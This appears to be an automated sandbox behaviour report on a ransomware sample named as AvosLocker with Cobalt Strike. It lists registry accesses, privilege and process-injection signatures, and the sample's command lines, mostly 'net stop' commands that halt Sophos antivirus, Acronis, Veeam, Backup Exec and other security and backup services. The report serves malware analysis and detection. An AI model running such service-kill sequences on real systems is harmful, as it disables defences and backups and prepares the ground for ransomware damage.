Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

